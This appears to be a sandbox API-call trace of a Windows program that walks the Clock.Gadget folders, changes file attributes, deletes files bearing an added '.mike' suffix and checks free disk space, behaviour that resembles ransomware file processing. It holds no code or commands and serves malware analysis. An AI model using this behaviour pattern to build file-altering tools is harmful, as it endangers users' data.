[0102.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0102.849] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\logo.png.mike")) returned 1 [0102.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x697c140, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x697c140, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8439c2bc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8439c2bc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2855fdaf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0102.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285ac06b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0102.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0102.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843c2419, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x843c2419, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e73115, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0102.851] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843c2419, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x843c2419, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e73115, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0102.851] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.852] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.852] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.852] CoTaskMemFree (pv=0x506980) [0102.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0102.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0102.852] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0102.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0102.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0102.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0102.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.853] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html", dwFileAttributes=0x80) returned 0 [0102.864] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html.mike")) returned 1 [0102.866] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0102.872] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.mike")) returned 1 [0102.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0102.880] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html.mike")) returned 1 [0102.881] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x69c8400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x69c8400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.881] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0102.881] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0102.882] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0102.882] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0102.882] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0102.882] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0102.882] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.882] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.882] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.883] CoTaskMemFree (pv=0x506980) [0102.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0102.883] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.884] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.css", cAlternateFileName="")) returned 1 [0102.884] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0102.884] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.884] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.css", cAlternateFileName="")) returned 1 [0102.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0102.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 0 [0102.885] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.886] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.886] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.886] CoTaskMemFree (pv=0x506980) [0102.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0102.886] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.886] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x467a, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.js", cAlternateFileName="")) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.887] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x467a, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.js", cAlternateFileName="")) returned 1 [0102.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 [0102.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 1 [0102.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="timeZones.js", cAlternateFileName="")) returned 0 [0102.888] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.888] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.888] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.889] CoTaskMemFree (pv=0x506980) [0102.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0102.890] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, 